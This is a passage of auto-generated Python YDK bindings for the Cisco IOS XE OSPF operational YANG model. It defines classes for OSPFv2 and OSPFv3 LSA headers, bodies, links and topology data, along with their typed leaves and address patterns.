Ospfv2Lsa(Entity): """ OSPFv2 LSA .. attribute:: header Decoded OSPFv2 LSA header data **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header>` **config**\: False .. attribute:: lsa_body Decoded OSPFv2 LSA body data **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, self).__init__() self.yang_name = "ospfv2-lsa" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv2-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, [], name, value) class Header(Entity): """ Decoded OSPFv2 LSA header data .. attribute:: lsa_id LSA ID **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: opaque_type Opaque type **type**\: int **range:** 0..255 **config**\: False .. attribute:: opaque_id Opaque ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: age LSA age **type**\: int **range:** 0..65535 **config**\: False .. attribute:: type LSA type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: adv_router LSA advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: seq_num LSA sequence number **type**\: str **config**\: False .. attribute:: checksum LSA checksum **type**\: str **config**\: False .. attribute:: length LSA length **type**\: int **range:** 0..65535 **config**\: False .. attribute:: flag_options LSA options **type**\: :py:class:`LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.LsaFlagOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])), ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])), ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])), ]) self.lsa_id = None self.opaque_type = None self.opaque_id = None self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self.flag_options = Bits() self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value) class LsaBody(Entity): """ Decoded OSPFv2 LSA body data .. attribute:: num_of_links Number of links **type**\: int **range:** 0..65535 **config**\: False .. attribute:: network Network details **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network>` **config**\: False .. attribute:: summary_mask Summary mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_mask External mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: body_flag_options LSA body flags **type**\: :py:class:`Ospfv2LsaBodyFlagsOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaBodyFlagsOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network))]) self._leafs = OrderedDict([ ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])), ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])), ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])), ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])), ]) self.num_of_links = None self.summary_mask = None self.external_mask = None self.body_flag_options = Bits() self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value) class Network(Entity): """ Network details .. attribute:: network_mask IP network mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: attached_router List of the routers attached to the network **type**\: list of int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])), ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ]) self.network_mask = None self.attached_router = [] self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value) class Ospfv2Link(Entity): """ OSPFv2 LSA link .. attribute:: link_id (key) Link ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: link_data (key) Link data **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: type Link type **type**\: int **range:** 0..255 **config**\: False .. attribute:: ospfv2_topology Topology specific information **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link, self).__init__() self.yang_name = "ospfv2-link" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_id','link_data'] self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology))]) self._leafs = OrderedDict([ ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ]) self.link_id = None self.link_data = None self.type = None self.ospfv2_topology = YList(self) self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value) class Ospfv2Topology(Entity): """ Topology specific information .. attribute:: mt_id (key) MT\-ID for topology enabled link **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: metric Metric for the topology **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "ospfv2-link" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2Topology(Entity): """ Summary LSA .. attribute:: mt_id (key) MT\-ID for topology enabled link **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: metric Metric for the topology **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2External(Entity): """ External LSA .. attribute:: mt_id (key) MT\-ID for topology enabled on the link **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: metric Metric for the topology **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External, self).__init__() self.yang_name = "ospfv2-external" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ]) self.mt_id = None self.metric = None self.forwarding_address = None self.external_route_tag = None self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value) class Ospfv2UnknownTlv(Entity): """ OSPFv2 Unknown TLV .. attribute:: type (key) TLV type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: length TLV length **type**\: int **range:** 0..65535 **config**\: False .. attribute:: value TLV value **type**\: list of int **range:** 0..255 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, self).__init__() self.yang_name = "ospfv2-unknown-tlv" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['type'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('value', (YLeafList(YType.uint8, 'value'), ['int'])), ]) self.type = None self.length = None self.value = [] self._segment_path = lambda: "ospfv2-unknown-tlv" + "[type='" + str(self.type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, ['type', 'length', 'value'], name, value) class Ospfv3LsaVal(Entity): """ OSPFv3 LSA .. attribute:: header Decoded OSPFv3 LSA header **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header>` **config**\: False .. attribute:: lsa_body Decoded OSPFv3 LSA body **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, self).__init__() self.yang_name = "ospfv3-lsa-val" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv3-lsa-val" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, [], name, value) class Header(Entity): """ Decoded OSPFv3 LSA header .. attribute:: lsa_id LSA ID **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: lsa_header LSA header **type**\: :py:class:`LsaHeader <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader>` **config**\: False .. attribute:: lsa_hdr_options OSPFv3 LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv3-lsa-val" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])), ]) self.lsa_id = None self.lsa_hdr_options = Bits() self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader() self.lsa_header.parent = self self._children_name_map["lsa_header"] = "lsa-header" self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, ['lsa_id', 'lsa_hdr_options'], name, value) class LsaHeader(Entity): """ LSA header .. attribute:: age LSA age **type**\: int **range:** 0..65535 **config**\: False .. attribute:: type LSA type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: adv_router LSA advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: seq_num LSA sequence number **type**\: str **config**\: False .. attribute:: checksum LSA checksum **type**\: str **config**\: False .. attribute:: length LSA length **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, self).__init__() self.yang_name = "lsa-header" self.yang_parent_name = "header" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ]) self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self._segment_path = lambda: "lsa-header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value) class LsaBody(Entity): """ Decoded OSPFv3 LSA body .. attribute:: network OSPFv3 network **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network>` **config**\: False .. attribute:: prefix OSPFv3 inter area prefix **type**\: :py:class:`Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix>` **config**\: False .. attribute:: ia_router OSPFv3 inter area router **type**\: :py:class:`IaRouter <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter>` **config**\: False .. attribute:: lsa_external OSPFv3 LSA external **type**\: :py:class:`LsaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal>` **config**\: False .. attribute:: nssa OSPFv3 NSSA **type**\: :py:class:`Nssa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa>` **config**\: False .. attribute:: link_data OSPFv3 Link data **type**\: :py:class:`LinkData <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData>` **config**\: False .. attribute:: ia_prefix OSPFv3 Intra area prefixes **type**\: :py:class:`IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix>` **config**\: False .. attribute:: lsa_flag_options LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False .. attribute:: lsa_body_flags LSA Body Flags **type**\: :py:class:`Ospfv3LsaBodyFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaBodyFlagOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv3-lsa-val" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix))]) self._leafs = OrderedDict([ ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])), ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])), ]) self.lsa_flag_options = Bits() self.lsa_body_flags = Bits() self.network = 